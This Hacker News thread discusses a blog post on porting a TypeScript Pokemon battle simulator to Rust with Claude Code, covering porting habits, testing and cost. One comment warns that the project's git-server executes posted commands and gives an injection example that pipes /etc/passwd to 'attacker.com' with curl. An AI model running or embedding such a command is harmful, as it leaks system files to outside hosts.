Porting 100k lines from TypeScript to Rust using Claude Code in a month

14 days ago (blog.vjeux.com)

This reminds me of when I tried to let Claude port an Android libgdx-based game to a WASM-based libgdx version, so I can play the game in the browser.

No matter how much I tried to force it to stick to a mostly line-by-line port, it kept trying to "improve" the code. At some point it had to undo everything as it introduced a number of bugs. I asked it: "What should I add to your prompt so you won't do this again?" and it gave me this:

  ### CRITICAL LESSON: Don't "Improve" During Porting
  -  **BIGGEST MISTAKE: Reorganizing working code**
    - **What I did wrong:** Tried to "simplify" by splitting `createStartButton()` into separate creation and layout methods
    - **Why it failed:** Introduced THREE bugs:
      1. Layout overlap (getY() vs getY() - getHeight())
      2. Children not sized (Group.setSize() doesn't affect children)
      3. Origins not updated (scaling animations broken)
    - **The fix:** Deleted my "improvements" and copied the original Android pattern faithfully
    - **Root cause:** Arrogance - assuming I could improve production-tested code without understanding all the constraints
    - **Solution:** **FOLLOW THE PORTING PRINCIPLES ABOVE** - copy first, don't reorganize
    - **Time wasted:** ~1 hour debugging self-inflicted bugs that wouldn't exist if I'd just copied the original
    - **Key insight:** The original Android code is correct and battle-tested. Your "improvements" are bugs waiting to happen.

I like the self-reflection of Claude, unfortunately even adding this to CLAUDE.md didn't fix it and it kept taking wrong turns so I had to abandon the effort.

  • Claude doesn't know why it acted the way it acted, it is only predicting why it acted. I see people falling for this trap all the time

    • It's not even predicting why it acted, it's predicting an explanation of why it acted, which is even worse since there's no consistent mental model.

    • It had been shown that LLMs don't know how they work. They asked a LLM to perform computations, and explain how they got to the result. The LLM explanation is typical of how we do it: add number digit by digit, with carry, etc... But by looking inside the neural network, it show that the reality is completely different and much messier. None of it is surprising.

      Still, feeding it back its own completely made up self-reflection could be an effective strategy, reasoning models kind of work like this.

      7 replies →

    • That's because when the failure becomes the context, it can clearly express the intent of not falling for it again. However, when the original problem is the context, none of this obviousness applies.

      Very typical, and gives LLMs the annoying Captain Hindsight -like behaviour.

    • IDK how far AIs are from intelligence, but they are close enough that there is no room for anthropomorphizing them. When they are anthropomorphized its assumed to be a misunderstanding of how they work.

      Whereas someone might say "geeze my computer really hates me today" if it's slow to start, and we wouldn't feel the need to explain the computer cannot actually feel hatred. We understand the analogy.

      I mean your distinction is totally valid and I dont blame you for observing it because I think there is a huge misunderstanding. But when I have the same thought, it often occurs to me that people aren't necessarily speaking literally.

      8 replies →

    • It’s not even doing that. It’s just an algorithm for predicting the next word. It doesn’t have emotions or actually think. So, I had to chuckle when it said it was arrogant. Basically, it’s training data contains a bunch of postmortem write ups and it’s using those as a template for what text to generate and telling us what we want to hear.

  • Worth pointing out that your IDE/plugin usually adds a whole bunch of prompts before yours - let alone the prompts that the model hosting provider prepends as well.

    This might be what is encouraging the agent to do best practices like improvements. Looking at mine:

    >You are a highly sophisticated automated coding agent with expert-level knowledge across many different programming languages and frameworks and software engineering tasks - this encompasses debugging issues, implementing new features, restructuring code, and providing code explanations, among other engineering activities.

    I could imagine that an LLM could well interpret that to mean improve things as it goes. Models (like humans) don't respond well to things in the negative (don't think about pink monkeys - Now we're both thinking about them).

    • It's also common for your own CLAUDE.md to have some generic line like "Always use best practices and good software design" that gets in the way of other prompts.

  • For anything large like this, I think it's critical that you port over the tests first, and then essentially force it to get the tests passing without mutating the tests. This works nicely for stuff that's very purely functional, a lot harder with a GUI app though.

    • The same insight can be applied to the codebase itself.

      When you're porting the tests, you're not actually working on the app. You're getting it to work on some other adjacent, highly useful thing that supports app development, but nonetheless is not the app.

      Rather than trying to get the language model to output constructs in the target PL/ecosystem that go against its training, get it to write a source code processor that you can then run on the original codebase to mechanically translate it into the target PL.

      Not only does this work around the problem where you can't manage to convince the fuzzy machine to reliably follow a mechanical process, it sidesteps problems around the question of authorship. If a binary that has been mechanically translated from source into executable by a conventional compiler inherits the same rightsholder/IP status as the source code that it was mechanically translated from, then a mechanical translation by a source-to-source compiler shouldn't be any different, no matter what the model was trained on. Worst case scenario, you have to concede that your source processor belongs to the public domain (or unknowingly infringed someone else's IP), but you should still be able to keep both versions of your codebase, one in each language.

  • I recently did a c++ to rust port with Gemini and it was basically a straight line port like I wanted. Nearly 10k lines of code too. It needed to change a bit of structure to get it compiling, but that's only because rust found bugs at compile time. I attribute this success to the fact my team writes c++ stylistically close to what is idiomatic rust, and that generally the languages are quite similar. I will likely do another pass in the future to turn the callback driven async into async await syntax, but off the bat it largely avoided doing so when it would change code structure.

  • It's not context-free (haha) but a trick you can try is to include negative examples into the prompt. It used to be an awful trick originally because of Waluigi Effect but then became a good trick, and lately with Opus 4.5 I haven't needed to do it that much. But it did work once. e.g. like take the original code and supply the correct answer and the wrong answers in the prompt as examples in Claude.MD and then redo.

    If it works, do share.

  • Humans act the same way.

    For all the (unfortunately necessary) conversations that have occurred over the years of the form, "JavaScript is not Java—they're two different languages," people sometimes go too far and tack on some remark like, "They're not even close to being alike." The reality, though, is that many times you can take some in-house package (though not the Enterprise-hardened™ ones with six different overloads for every constructor, and four for every method, and that buy hard into Java (or .NET) platform peculiarities—just the ones where someone wrote just enough code to make the thing work in that late-90's OOP style associated with Java), and more or less do a line-by-line port until you end up with a native JS version of the same program, which with a little more work will be able to run in browser/Node/GraalJS/GJS/QuickJS/etc. Generally, you can get halfway there by just erasing the types and changing the class/method declarations to conform to the different syntax.

    Even so, there's something that happens in folks' brains that causes them to become deranged and stray far off-course. They never just take their program, where they've already decomposed the solution to a given problem into parts (that have already been written!), and then just write it out again—same components, same identifier names, same class structure. There's evidently some compulsion where, because they sense the absence of guardrails from the original language, they just go absolutely wild, turning out code that no one would or should want to read—especially not other programmers hailing from the same milieu who explicitly, avowedly, and loudly state their distaste for "JS" (whereby they mean "the kind of code that's pervasive on GitHub and NPM" and is so hated exactly because it's written in the style their coworker, who has otherwise outwardly appeared to be sane up to this point, just dropped on the team).

  • Was this Claude Code? If you tried it with one file at a time in the chat UI I think you would get a straight-line port, no?

    Edit: It could be because Rust works a little differently from other languages, a 1:1 port is not always possible or idiomatic. I haven't done much with Rust but whenever I try porting something to Rust with LLMs, it imports like 20 cargo crates first (even when there were no dependencies in the original language).

    Also Rust for gamedev was a painful experience for me, because rust hates globals (and has nanny totalitarianism so there's no way to tell it "actually I am an adult, let me do the thing"), so you have to do weird workarounds for it. GPT started telling me some insane things like, oh it's simple you just need this rube goldberg of macro crates. I thought it was tripping balls until I joined a Rust discord and got the same advice. I just switched back to TS and redid the whole thing on the last day of the jam.

    • > rust hates globals

      Rust has added OnceCell and OnceLock recently to make threadsafe globals a lot easier for some things. it's not "hate", it just wants you to be consistent about what you're doing.

  • That’s a terrible prompt, more focused on flagellating itself for getting things wrong than actually documenting and instructing what’s needed in future sessions. Not surprising it doesn’t help.

  • Sonnet 4.5 had this problem. Opus 4.5 is much better at focusing on the task instead of getting sidetracked.

  • I wish there was a feature to say "you must re-read X" after each compaction.

  • Well its close to AGI, can you really expect AGI to follow simple instructions from dumbos like you when it can do the work of god?

    • as an old coworker once said, when talking about a certain manager; That boy's just smart enough to be dumb as shit (The AI, not you; I don't know you well enough to call you dumb)

Some quotes from the article stand out: "Claude after working for some time seem to always stop to recap things" Question: Were you running out of context? That's why certain frameworks like intentional compaction are being worked on. Large codebases have specific needs when working with an LLM.

"I've never interacted with Rust in my life"

:-/

How is this a good idea? How can I trust the generated code?

  • The author says that he runs both the reference implementation and the new Rust implementation through 2 million (!) randomly generated battles and flags every battle where the results don't line up.

    • This is the key to the whole thing in my opinion.

      If you ask a coding agent to port code from one language to the another and don't have a robust mechanism to test that the results are equivalent you're inevitably going to waste a lot of time and money on junk code that doesn't work.

      2 replies →

  • I'm very skeptical, but this is also something that's easy to compare using the original as a reference implementation, right? providing lots of random input and fixing any disparities is a classic approach for rewriting/porting a system

    • This only works up to a certain point. Given that the author openly admits they don't know/understand Rust, there is a really high likelihood that the LLM made all kinds of mistakes that would be avoided, and the dev is going to be left flailing about trying to understand why they happen/what's causing them/etc. A hand-rewrite would've actually taught the author a lot of very useful things I'm guessing.

      1 reply →

  • Hopefully they have a test suite written by QA otherwise they're for sure going to have a buggy mess on their hands. People need to learn that if you must rewrite something (often you don't actually need to) then an incremental approach best.

    • 1 month of Claude Code would be an incremental approach

      It would honestly try to one-shot the whole conversion in a 30 minute autonomous session

  • His goal was to get a faster oracle that encoded the behavior of Pokemon that he could use for a different training project. So this project provides that without needing to be maintainable or understandable itself.

    • Back of the envelope, they'll need to use this on the order of a billion times to break even, under the (laughable) assumption that running claude code uses comparable compute as the computer he's running his code on. So more like hundreds of billions or trillions, I'd guess.

  • I think it could work if they have tests with good coverage, like the "test farm" described by someone who worked in Oracle.

  • My answer to this is to often get the LLMs to do multiple rounds of code review (depending on the criticality of the code, doing reviews on every commit. but this was clearly a zero-impact hobby project).

    They are remarkably good at catching things, especially if you do it every commit.

    • > My answer to this is to often get the LLMs to do multiple rounds of code review

      So I am supposed to trust the machine, that I know I cannot trust to write the initial code correctly, to somehow do the review correctly? Possibly multiple times? Without making NEW mistakes in the review process?

      Sorry no sorry, but that sounds like trying to clean a dirty floor by rubbing more dirt over it.

      13 replies →

  • > How is this a good idea? How can I trust the generated code?

    You don't. The LLMs wrote the code and is absolutely right. /s

    What could possibly go wrong?

  • Same way you trust any auto translation for a document. You wrote it in English (or whatever language you’re most proficient in), but someone wants it in Thai or Czech, so you click a button and send them the document. It’s their problem now.

I ported a closed source web conferencing tool to Rust over about a week with a few hours of actual attention and keyboard time. From 2.8MB of minified JS hosted in a browser to a 35MB ARM executable that embeds its own audio, WebRTC, graphics, embedded browser, etc. Also a mdbook spec to explain the protocol, client UI, etc. Zero lines of code by me. The steering work did require understanding the overall work to be done, some high level design of threading and buffering strategy, what audio processing to do, how to do sprite graphics on GPU, some time in a profiler to understand actual CPU time and memory allocations, etc. There is no way I could have done this by hand in a comparable amount of time, and given the clearly IP-encumbered nature I wouldn't spend the time to do it except that it was easy enough and allowed me to then fix two annoying usability bugs with the original.

  • Please give us a write up

    • I don't have time right now for a proper write-up but the basic points in the process were:

      1. Write a document that describes the work. In this case I had the minified+bundled JS, no documentation, but I did know how I use the system and generally the important behavioral aspects of the web client. There are aspects of the system that I know from experience tend to be tricky, like compositing an embedded browser into other UI, or dealing with VOIP in general. Other aspects, like JS itself, I don't really know deeply. I knew I wanted a Mac .app out the end, as well as Flatpak for Linux. I knew I wanted an mdbook of the protocol and behavioral specs. Do the best you can. Think really hard about how to segment the work for hands-off testability so the assistant can grind the loop of add logs, test run, fix, etc.

      2. In Claude Desktop (or whatever) paste in the text from 1 and instruct it to research and ask you batches of 10 clarifying questions until it has enough information to write a work plan for how to do the job, specific tools, necessary documentation, etc. Then read and critique until you feel like the thread has the elements of a good plan, and have Claude generate a .md of the plan.

      3. Create a repo containing the JS file and the plan.

      4. Add other tools like my preferred template for change implementation plans, Rust style guide, etc (have the chatbot write a language style guide for any language you use that covers the gap between common practice ~3 years ago and the specific version of the language you want to use, common errors, etc). I have specific instructions for tracking current work, work log, and key points to remember in files, everyone seems to do this differently.

      5. Add Claude Code (or whatever) to the container or machine holding the repo.

      Repeat until done:

      6a. Instruct the assistant to do a time-boxed 60 minutes of work towards the goal, or until blocked on questions, then leave changes for your review along with any questions.

      6b. Instruct the assistant to review changes from HEAD for correctness, completeness, and opportunities to simplify, leaving questions in chat.

      6c. Review and give feedback / make changes as necessary. Repeat 6b until satisfied.

      6d. Go back to 6a.

      At various points you'll find that the job is mis-specified in some important way, or the assistant can't figure out what to do (e.g. if you have choppy audio due to a buffer bug, or a slow memory leak, it won't necessarily know about it). Sometimes you need to add guidance to the instructions like "update instructions to emphasize that we must never allocate in situation XYZ". Sometimes the repo will start to go off the rails messy, improved with instructions like "consider how to best organize this repository for ease of onboarding the next engineer, describe in chat your recommendations" and then have it do what it recommended.

      There's a fair amount of hand-holding but a lot of it is just making sure what it's doing doesn't look crazy and pressing OK.

      2 replies →

I've seen stuff like this go the opposite direction with researchers (who generally aren't software engineers):

"I used claude to port a large Rust codebase to Python and it's been a game changer. Whereas I was always fighting with the Rust compiler, now I can iterate very quickly in python and it just stays out of my way. I'm adding thousands of lines of working code per day with the help of AI."

I always cringe when I read stuff like this because (at my company at least), a lot research code ends up getting shipped directly to production because nobody understands how it works except the researchers and inevitably it proves to be very fragile code that is untyped and dumps stack traces whenever runtime issues happen (which is quite frequently at first, until whack-a-mole sorts them out over time).

The author's differential testing (2.3M random battles) is great as final validation, but the real lesson here is that modular testing should happen during the port, not after.

1. Port tests first - they become your contract 2. Run unit tests per module before moving on - catches issues like the "two different move structures" early 3. Integration tests at boundaries before proceeding 4. E2e/differential testing as final validation

When you can't read the target language, your test suite is your only reliable feedback. The debugging time spent on integration issues would've been caught earlier with progressive testing.

  • The real lesson... I mean, if all of this took 1 month, the TFA already did amazingly well. Next time they'll do even better, no doubt.

>I realized that I could run an AppleScript that presses enter every few seconds in another tab. This way it's going to say Yes to everything Claude asks to do.

this is so silly, I can't help but respect the kludge game

> I have never written any line of Rust before in my life

As an experiment/exercise this is cool, but having a 100k loc codebase to maintain in a language I’ve never used sounds like a nightmare scenario.

  • I kind of expect that code to be full of non-idiomatic Rust code that mimics a GC'ed language...

    Once that's also "fixed", it may well be a lot faster than the current Rust version.

    • That isn't what I've seen. It seems to use every language in the way idiomatic for it, or more accurately, in the way it has een that language be ised. Rust written that way isn't present in it's training corpus so it doesn't do that. I would be more concerned about it getting creative and adding something a cool rustacean might add in the porting process that you don't actually want.

Like a couple of others here I tried checking out this project [1] and running these 2.3 million random battles. The README says everything needs to be run in docker, and indeed the test script uses docker and fails without it, but there are no docker/compose files in the repo.

It's great that the repo is provided, but people are clamouring for proof of the extraordinary powers of AI. If the claim is that it allowed 100 kloc to be ported in one month by one dev and the result passes a gazillion tests that prove it actually replicates the desired functionality, that's really interesting! How hard would it be, then, to actually have the repo in a state where people can run those tests?

Unless the repo is updated so the tests can be run, my default assumption has to be that the whole thing is broken to the point of uselessness.

[1] Link buried at the end: https://github.com/vjeux/pokemon-showdown-rs

Am I the only one that is going to call this out? Am I the only person that cloned the repo to run it and found out it does nothing? This is disingenuous at a best. This is not a working project, they even admit this at the end of the article but not directly.

>Sadly I didn't get to build the Pokemon Battle AI and the winter break is over, so if anybody wants to do it, please have fun with the codebase!

In other words this is just another smoking wreck of an hopelessly incomplete project on github. There is even imaginary instructions for running in docker which doesn't exist. How would I have fun with a nonsense codebase?

The author just did a massive AI slop generation and assumes the codes works because it compiles and some equivalent output tests worked. All that was proved here is that by wasting a month of time you can individually rewrite a bunch of functions in a language you don't know if you already know how to program and it will compile. This has been known for 2-3 years now.

This is just AI propaganda or resume padding. Nothing was ported or done here.

Sorry what I meant to say is AI is revolutionary and changing the world for the better................................

  • no you're right, i find it wild you're the only comment in this thread calling this out

    this project is just a literal waste of energy

How much does it cost to run Claude Code 24 hrs/day like this. Does the $200/month plan hold up? My spend on Cursor has been high... I'm wondering if I can just collapse it into a 200/month CC subscription.

  • If you're using it 24h/day you probably will run into it unless you're very careful about managing context and/or the requests are punctuated by long-running tool use (e.g. time-consuming test suites).

    I'm on the $200/month plan, and I do have Claude running unattended for hours at a time. I have hit the weekly limits at times of particularly aggressive use (multiple sessions in parallel for hours at a time) but since it's involved more than one session at the time, I'm not really sure how close I got to the equivalent of one session 24/7.

  • There's a daily token limit. While I've never run into that limit while operating Claude as a human, I have received warnings that I'm getting close. I imagine that an unattended setup will blow through the token limit in not too much time.

  • I built a similar autonomous loop using LangGraph for a publishing backend and the raw API costs were significantly higher than $200. The subscription model likely has opaque usage limits that trigger fairly quickly under that kind of load. For a bootstrapped setup I usually find the predictability of the API bill worth the premium over hitting a black box limit.

  • I have no first-hand experience with the Max subscription (which the $200 plan is) but having read a few discussions here and on GitHub [1] it seems that Anthropic has tanked the usage limits in the last few weeks and thus I would argue that you would run into limits pretty quick if you using it (unsupervised) for 24h each day.

    1) https://github.com/anthropics/claude-code/issues/16157

    • The employee in that thread claims that they didn't change the rate limits and when they look into it, it's usually noob error.

      It's a really low quality github issue thread. People making claims with zero data, just vibes, yet it's trivial to get the data to back the claims.

      The guy who responds to the employee even claims that his "lawyer is already on the case" in some lame threat.

      I wonder how many of these people had 30 MCP servers installed using 150k of their 200k context in every prompt.

      1 reply →

This seems like one of the best possible use cases for LLMs -- porting old, useful Python/Javascript into faster compiled language code. Something I don't want to do, that requires the type of intelligence that most people agree AI already has (following clear objectives, not needing much creativity or agency).

>I've tried asking Claude to optimize it further, it created a plan that looks reasonable (I've never interacted with Rust in my life) and it spent a day building many of these optimizations but at the end of the day, none of them actually improved the runtime and some even made it way worse.

This is the kind of thing where if this was a real developer tweaking a codebase they're familiar with, it could get done, but with AI there's a glass ceiling

  • Yeah, I had Claude spend a lot of time optimizing a JS bundling config (as a quite senior frontend) and it started some things that looked insanely promising, which a newer FE dev would be thrilled about.

    I later realized it sped up the metric I'd asked about (build time) at the cost of all users downloading like 100x the amount of JS.

    • This is what LLMs are good at, generate what "look[s] insanely promising" to us humans

  • I just ran into the problem of extremely slow uploads in an app I was working on. Told Gemini to work on it, and it tried to get the timing of everything, then tried to optimize the slow parts of the code. After a long time, there might have been some improvements, but the basic problem remained: 5-10 seconds to upload an image from the same machine. Increasing the chunk size fixed the problem immediately.

    Even though the other optimizations might have been ok, some of them made things more complicated, so I reverted all of them.

This is actually pretty incredible. Cannot really argue against the productivity in this case.

  • one possible argument against the productivity is if the mirgration introduced too many bugs to be useable.

    In which case the code produced has zero value, resulting in a wasted month.

  • I suppose what’s impressive is that (with the author’s help) it did ultimately get the port to work, in spite of all the caveats described by the author that make Claude sound like a really bad programmer. The code is likely terrible, and the 3.5x speedup way low compared to what it could be, but I guess these days we’re supposed to be impressed by quantity rather than quality.

  • Its not. The project does not work or actually implement anything. It just compiles and passes some arbitrary tests the author wrote.

    • We must have a different definition of arbitrary. OP ran 2.3 million tests comparing random battles against the original implementation? Which is probably what you or I would do if we were given this task without an LLM.

      1 reply →

For typing “yes” or “y” automatically into command prompts without interacting, you could have utilized the command ‘yes’ and piped it into the process you’re running as a first attempt to solving the yes problem. https://man7.org/linux/man-pages/man1/yes.1.html

  • I don't think this is an actual problem and the prompt is there for a reason.

    Piping 'yes' to command prompts just to auto-approve any change isn't really a good idea, especially when the code / script can be malicious.

    • And here I was hoping OP was being sarcastic. Yet it‘s reasonable we‘re nearing an AI-fueled Homer drinking bird scenario.

      Some concepts people try out using AI (for lack of a more specific word) are interesting. They will add to our collective understanding of when these tools, paired with meaningful methods can be used to effectively achieve what seemed out of reach before.

      Unfortunately it comes with many rediscovering insights I thought we already had, badly. Others use tools without giving consideration to what they were looking to accomplish, and how they would know if they did.

I'm hoping that one day we can use AI to port the millions of lines in the modules of the Python ecosystem to a GIL-free version of Python.

This reminded of me porting low-level JS library and its tests (~10k loc) to Java about 6 months ago (so mostly it was Sonnet 4)

My goal was to have 1:1 port, so later I can easily port newer commits from original repo. It wasn’t smooth, but it the end it worked

Findings:

* simple prompt like port everything didn’t work as Sonnet was falling into the loop of trying to fix code that it couldn’t understand, so at the end it just deleted that part :))

* I had to switch to file by file basis, focus Claude on the base code then move to files that use the base code

* Sonnet had some problems of following 1:1 instruction, I saw missing parts of functions, missing comments, even simple instruction to follow same order of functions in the file (had to tell explicitly to list functions in the file and then create separate TODO to port each)

This gives me hope that some people will use AI to port Javascript desktop apps to faster languages.

I recently had to create a MySQL shim for upgrading a large PHP codebase that currently is running in version 5.6 (Don't ask)

The way I aimed at it (Yes, I know there are already existing shims, but I felt more comfortable vibe coding it than using something that might not cover all my use cases) was to:

1. Extract already existing test suit [1] from the original PHP extensions repo (All .phpt files)

2. Get Claude to iterate over the results of the tests while building the code

3. Extract my complete list of functions called and fill the gaps

3. Profit?

When I finally got to test the shim, the fact that it ran in the first run was rather emotional.

[1] My shim fails quite a lot of tests, but all of them are cosmetics (E.g., no warning for deprecation) rather than functional.

Biggest takeaway: the project succeeded because its acceptance criteria were clear and deterministic.

The human driving the LLM gave it a way to know when it was done and a way to move toward that goal. They used code to generate tests and let the agent evaluate its implementation in a deterministic way.

This is the value of an engineer: you understand when to introduce determinism to let the LLM do the bit it does best - while keeping it on the rails.

To be honest I think it should be the other way around.

Typescript is a good high-level language that is versatile and well generated by LLMs and there is a good support for various linters and other code support tools. You can probably knock out more TS code then Rust and at faster rate (just my hypothesis). For most intents and purposes this will be fine but in case you want faster, lower-level code, you can use an LLM-backed compiler/translator. A specialised tool that compiles high level code to rust will be awesome actually and I can see how it could potentially be a dedicated agent of sorts.

Did you ever consider using something like Oh My Opencode [1]? I first saw it in the wake of Anthropic locking out Opencode. I haven’t used it but it appears to be better at running continuously until a task is finished. Wondering if anyone else has tried migrating a huge codebase like this.

[1] https://github.com/code-yeongyu/oh-my-opencode

One thing I learned with porting is that one should have end to end integration test present to ensure no major functionality is broken.

At the current stage, the main issue is that when porting to a new language, some critical parts are missed. This increases the complexity of the codebase and leads to unnecessary code. In my personal opinion, creating a cross language compiler is a better approach than porting languages, while also focusing on squeezing performance.

> For example, it created two different structures for what a move is in two different files so that they would both compile independently but didn't work when integrated together.

This is the most annoying part of using LLMs blindly. The duplication.

Let's hope Claude doesn't decide to run anything else through that git-server, since it's exec-ing whatever is posted over http.

But hey, so long as it starts with 'git ' you're safe, riiiiight? Oh, 'git status; curl -X POST attacker.com -d @/etc/passwd'

https://raw.githubusercontent.com/vjeux/pokemon-showdown-rs/...

  • That's a good one.

    Seasoned developers who would not make such a mistake could also be lead to think the llm is writing safe code if they don't ever read it line by line.

    Vibe coders who are not seasoned developers, not sure if they would even know that this isn't safe code even if they read it line by line.

Hey, even the README was vibe-coded!

It probably works on his machine, but telling me to run it through Docker while not providing any Docker Files or any other way to run the project kind of makes me question the validity of the project, or at least not trust it.

Whatever, I'll just build it manually and run the test:

  cargo build --release 
  
  ./tests/test-unified.sh 1 100

  Running battles...
  Error response from daemon: No such container: pokemon-rust-dev
  Comparing results...

  =======================================
  Summary
  =======================================
  Total: 100
  Passed: 0
  Failed: 0

  ALL SEEDS PASSED!

Yay! But wait, actually no? I mean 0 == 0 so thats cool.

Oh the test script only works on a specificially named container, so I HAVE to create a Dockerfile and docker-compose.yml. But I guess this is just a Research Project so it's fine. I'll just ask Opus to create them I guess. It will probably only take a minute

JK, it took like 5 minutes, because it had to figure out Cargo/Rust version or sth I don't know :( So this better work or I've wasted my precious tokens!

Ok so running cargo test inside the docker container just returns a bunch of errors:

  docker exec pokemon-rust-dev bash -c "cd /home/builder/workspace && cargo test 2>&1"

  error: could not compile `pokemon-showdown` (test "battle_simulation") due to 110 previous errors

Let's try the test script:

  ./tests/test-unified.sh 1 100

  Building release version...
   = note: `#[warn(dead_code)]` on by default

  warning: `pokemon-showdown` (example "profile_battle") generated 1 warning
  warning: `pokemon-showdown` (example "detailed_profile") generated 1 warning
      Finished `release` profile [optimized] target(s) in 0.45s

  =======================================
  Unified Testing Seeds 1-100 (100 seeds)
  =======================================

  Running battles...
  Comparing results...

  =======================================
  Summary
  =======================================
  Total: 100
  Passed: 0
  Failed: 0

  ALL SEEDS PASSED!

Yay! Wait, no. What did I miss? Maybe the test script needs the original TS source code to work? I cloned it into a folder next to this project and... nope, nothing.

At this point I give up. I could not verify if this port works. If it does, that's very, VERY cool. But I think when claiming something like this it is REALLY important to make it as easily verifiable as possible. I tried for like 20 minutes, if someone smarter than me figured it out please tell me how you got the tests to pass.

> requires my engineering expertise and constant babysitting

What the skeptics have been saying all along.

I've also done a few porting projects. It works great if you can do it file-per-file, class-per-class. Really have a similar structure in the target as the source. Porting _and_ improving or making small changes is a recipe for disaster

At this rate, I am expecting that an AI will be able to port the entire Linux kernel to Rust by the end of the year.

Honestly I am really interested in trying to port the rust code to multiple languages like golang,zig, even niche languages like V-lang/Odin/nim etc.

It would be interesting if we use this as a benchmark similar to https://benjdd.com/languages/ or https://benjdd.com/languages2/

I used gitingest on the repository that they provided and its around ~150k tokens

Currently pasted it into the free gemini web and asked it to write it in golang and it said that line by line feels impossible but I have asked it to specifically write line by line so it would be interesting what the project becomes (I don't have many hopes with the free tier of gemini 3 pro but yeah, if someone has budget, then sure they should probably do it)

Edit: Reached rate limits lmao